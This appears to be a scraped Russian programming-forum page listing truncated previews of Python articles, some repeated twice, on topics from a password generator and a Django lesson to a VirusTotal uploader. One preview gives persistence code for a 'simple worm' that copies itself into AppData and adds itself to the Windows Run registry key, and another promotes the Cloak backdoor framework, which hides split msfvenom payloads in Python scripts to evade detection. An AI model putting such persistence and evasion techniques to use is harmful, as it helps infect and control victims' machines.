Программирование для ИБ
Статья Пишем сценарий для определения уязвимого ПО на Python
Приветствую всех! Сегодня с утра пришла идея к написанию данного сценария. Я смог написать его и решил поделиться с вами, возможно он будет вам полезен.
Он будет получать список установленных программ в windows и искать уязвимые версии.
Скрипт сыроват, но я планирую доделать его, добавить полную автоматизацию, чтобы он показывал сразу все уязвимое ПО.
Приступим к написанию.
Вот такие либы я буду юзать:
Тк.к сценарий я пишу для windows, то чтобы был цветной текст в консоле, мы должны дописать:
Добавим свои аргументы:
Введем переменные:
Он будет получать список установленных программ в windows и искать уязвимые версии.
Скрипт сыроват, но я планирую доделать его, добавить полную автоматизацию, чтобы он показывал сразу все уязвимое ПО.
Приступим к написанию.
Вот такие либы я буду юзать:
Код:
from subprocess import check_output
import argparse
from termcolor import *
import coloramaТк.к сценарий я пишу для windows, то чтобы был цветной текст в консоле, мы должны дописать:
colorama.init()Добавим свои аргументы:
Код:
parser = argparse.ArgumentParser(description='Find vuln PO')
parser.add_argument('-vs', help ='Vuln version PO')
parser.add_argument('-nm', help ='PO Name')
args = parser.parse_args()
vulnvers = args.vs
namepo = args.nmВведем переменные:
Код:
count = 0
count2 = 0
s = []
s2 = []
a = check_output(["wmic"...Статья Простой червь на python
Всем доброго времени суток, участники Codeby!
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.
Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.
Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.
Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.
Python:
directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)
if not os.path.exists(directory):
os.makedirs(directory)
shutil.copy(__file__, base_file)Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.
Python:
path_to_reestr = OpenKey(HKEY_CURRENT_USER,
r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)...Пишем простой менеджер загрузок
Приветствую всех, эта рубрика моих никому не нужных разработок. И сегодня мы с вами будем писать простой менеджер загрузок или сценарий для загрузки больше кол-ва файлов. Попробую объяснить для чего это. Представьте что у вас есть ссылки на загрузку музыки(их очень много), вы же не будете переходить по каждой ссылке и скачивать? Мы автоматизируем этот процесс. В файле будут ссылки на скачку, а сценарий скачает их за нас.
!Пишу на python3!
Идея статьи в том, чтобы улучшить знания python читателя(возможно он откроет для себя что-то новое).
Вот такие либы я буду юзать для реализации того, что я хочу.
Введем списки для работы:
Теперь реализуем чтение ссылок из файла:
!Пишу на python3!
Идея статьи в том, чтобы улучшить знания python читателя(возможно он откроет для себя что-то новое).
Вот такие либы я буду юзать для реализации того, что я хочу.
Код:
import requests
import random
import glob
import os
import shutilВведем списки для работы:
Код:
site = []
files = []Теперь реализуем чтение ссылок из файла:
Код:
handle = open('sites.txt') # Читаем файл
for x in handle: #Записуем содержимое файла в список
site.append(x)
site = map(lambda s: s.strip(), site) # Удаляем из списка \n
site = list(site) #...
Пакуем Python в EXE
Всем известно что питон это интерпретируемый, а не компилируемый язык . И в первую очередь рассчитан для работы в командной строке. Тем не менее, существует много вариантов оформления кода в GUI при необходимости. Но сегодня речь пойдёт об упаковке программы в EXE.
Зачем вообще это надо? Да по сути и не надо в большинстве случаев. Но бывает, что вы написали или скопировали какую-нибудь интересную тулзу, и хотите с ней поделиться. Конечно, если у того, кому вы отправляете прогу есть Python, то проблем нет. А бывает, что человек не шарит совсем в кодинге, и как пользователь тоже не имеет установленного питона нужной версии.
Вот тогда и выручает упаковка файла или файлов в EXE. Такой файл будет запускаться и работать по клику мышки, всё очень просто.
Для сборки файлов в экзешник есть разные приложения. Я рассмотрю самый простой, без всяких заморочек, с которым разберётся любой новичок.
Скачиваем прогу [SPOILER="Convert to...
Зачем вообще это надо? Да по сути и не надо в большинстве случаев. Но бывает, что вы написали или скопировали какую-нибудь интересную тулзу, и хотите с ней поделиться. Конечно, если у того, кому вы отправляете прогу есть Python, то проблем нет. А бывает, что человек не шарит совсем в кодинге, и как пользователь тоже не имеет установленного питона нужной версии.
Вот тогда и выручает упаковка файла или файлов в EXE. Такой файл будет запускаться и работать по клику мышки, всё очень просто.
Для сборки файлов в экзешник есть разные приложения. Я рассмотрю самый простой, без всяких заморочек, с которым разберётся любой новичок.
Скачиваем прогу [SPOILER="Convert to...
Пишем простой генератор сложных паролей
Тема не новая, генераторов существует множество, однако такой простой код и глазу приятен, и место не занимает.
Для начала вставим в шапку кодировку и версию питона. Импортируем модуль random для генерации случайной последовательности. Зададим переменную chars и вобьём буквы в разном регистре, цифры и какие-нибудь спецсимволы для получения максимально взломостойкого пароля.
Чтобы программа тупо не генерила один пароль или строго заданное количество, разрешим пользователю самому решать сколько паролей он хочет сгенерировать. Кроме этого дадим возможность определять и длину пароля.
Осталось добавить самое главное - цикл случайной генерации символов, букв и цифр из нашей...
Для начала вставим в шапку кодировку и версию питона. Импортируем модуль random для генерации случайной последовательности. Зададим переменную chars и вобьём буквы в разном регистре, цифры и какие-нибудь спецсимволы для получения максимально взломостойкого пароля.
Python:
# -*- coding:utf -8 -*-
#!/usr/bin/python3
import random
chars = '+-/*!&$#?=@<>abcdefghijklnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
Python:
number = input('количество паролей?'+ "\n")
length = input('длина пароля?'+ "\n")
number = int(number)
length = int(length)Приложения в джанго
(Данный урок взят с моего сайта, т.к на него мало кто заходит (точнее никто), то я решил опубликовать его здесь, потому что , хочется как-то помочь новичкам в изучении django. Буду рад критике)
Здравствуйте дорогие пользователи, как я и обещал сегодня мы настроим и разберем все файлы созданные нами, свой созданный на проект и создадим свое первое веб-приложение. Для начала я вам расскажу что, такое веб-приложение в джанго (и не только), веб-приложение это - серверное приложение, в котором клиент взаимодействует с сервером при помощи браузера. Такс, что такое веб-приложение я вам рассказал, теперь разберем все файлы созданные нами (на прошлом уроке), и потом уж приступим к созданию и настройке приложения.
Разборка:
Здравствуйте дорогие пользователи, как я и обещал сегодня мы настроим и разберем все файлы созданные нами, свой созданный на проект и создадим свое первое веб-приложение. Для начала я вам расскажу что, такое веб-приложение в джанго (и не только), веб-приложение это - серверное приложение, в котором клиент взаимодействует с сервером при помощи браузера. Такс, что такое веб-приложение я вам рассказал, теперь разберем все файлы созданные нами (на прошлом уроке), и потом уж приступим к созданию и настройке приложения.
Разборка:
- Manage.py в основном это файл с помощью которого мы будем выполнять команды django (python manage.py runserver и т.д)
- Settings.py, это один из самых главных файлов django, который применяет...
Пишем скрипт для работы с VirusTotal-ом
Приветствую всех! Сегодня я вам покажу как сделать скрипт, который будет загружать все что вы скачали на вирустотал, т.е это для того, чтобы не подхватить вирус. Возможно этот скрипт не будет вам полезен.
Недавно перешел на python3. Советую всем переходить))
Приступим к программированию !
По дефолту(у меня уже привычка) ставим это
Теперь импортируем библиотеки, которыми мы будем пользоваться.
Я захотел сделать цветной текст, но в windows он не отображался, путем гугления нашел решение пишем:
Далее я создаю функцию которая отобразит банер нашего скрипта.
Теперь я создаю функцию для очистки консоли(для красоты).
Недавно перешел на python3. Советую всем переходить))
Приступим к программированию !
По дефолту(у меня уже привычка) ставим это
# -*- coding: utf-8 -*- в начале нашего скрипта.Теперь импортируем библиотеки, которыми мы будем пользоваться.
Код:
from termcolor import *
import colorama
import os
import time
from sys import platform
import requests
import webbrowserЯ захотел сделать цветной текст, но в windows он не отображался, путем гугления нашел решение пишем:
colorama.init()Далее я создаю функцию которая отобразит банер нашего скрипта.
Код:
def banner():
cprint('-' * 50,'green')
cprint(' ' * 17 + 'DefendMySystem','red')
cprint('-' * 50,'green')Теперь я создаю функцию для очистки консоли(для красоты).
Код:
def...Ваяем музыкальную открытку на Python
Вдруг пришла идея сделать музыкальную открытку на Python. Почему бы нет?
Приступим.
Для этого конечно нужен графический интерфейс. Воспользуемся уже входящим в стандарт модулем tkinter . Tkinter - это интерфейс Python к GUI Tk.
Импортируем модуль, рисуем окно, пишем в заголовке окна "Hello codeby!" и запрещаем изменять размеры окна по ширине и высоте.
Далее создаём холст с размерами выбранной картинки и прописанным путём к ней. Параметр bg="blue" задаёт цвет фона, если картинка будет недоступна.
Следующим этапом пишем текст. На холсте текст и фон к нему элементарно раскрашиваются кодами...
Приступим.
Для этого конечно нужен графический интерфейс. Воспользуемся уже входящим в стандарт модулем tkinter . Tkinter - это интерфейс Python к GUI Tk.
Импортируем модуль, рисуем окно, пишем в заголовке окна "Hello codeby!" и запрещаем изменять размеры окна по ширине и высоте.
Python:
# -*- coding:utf -8 -*-
from tkinter import *
root = Tk()
root.title("Hello codeby!")
root.resizable(width=False, height=False)Далее создаём холст с размерами выбранной картинки и прописанным путём к ней. Параметр bg="blue" задаёт цвет фона, если картинка будет недоступна.
Python:
C = Canvas(root, bg="blue", height=330, width=500)
filename = PhotoImage(file = "C:\\black_blue.png")
background_label = Label(root, image=filename)
background_label.place(x=0, y=0, relwidth=1, relheight=1)Следующим этапом пишем текст. На холсте текст и фон к нему элементарно раскрашиваются кодами...
Cloak - python backdoor.
Всем привет. Представляю вам Backdoor на python.
Страница разработчика -== s0md3v/Cloak
Разработчик -== s0md3v
Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента!
Введение.
Cloak - Backdoor Framework , который написан на python.
Cloak (Backdoor Framework) генерирует полезную нагрузку python через msfvenom и затем вводит его в указанный вами скрипт python.
Чтобы избежать обнаружения, Cloak разбивает полезную нагрузку на несколько частей и помещает ее в разные места в коде.
Если вы хотите, чтобы жертва запускала ваш инъецированный скрипт с правами root, Cloak также может справиться с этим.
Cloak может использовать любой скрипт python с некоторыми трюками.
Слова разработчика:
В будущем плащ будет дополнительно модернизирован для поддержки широкого спектра полезных нагрузок, платформ и методов уклонения.
Cloak работает лучше всего на...
Страница разработчика -== s0md3v/Cloak
Разработчик -== s0md3v
Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента!
Введение.
Cloak - Backdoor Framework , который написан на python.
Cloak (Backdoor Framework) генерирует полезную нагрузку python через msfvenom и затем вводит его в указанный вами скрипт python.
Чтобы избежать обнаружения, Cloak разбивает полезную нагрузку на несколько частей и помещает ее в разные места в коде.
Если вы хотите, чтобы жертва запускала ваш инъецированный скрипт с правами root, Cloak также может справиться с этим.
Cloak может использовать любой скрипт python с некоторыми трюками.
Слова разработчика:
В будущем плащ будет дополнительно модернизирован для поддержки широкого спектра полезных нагрузок, платформ и методов уклонения.
Cloak работает лучше всего на...
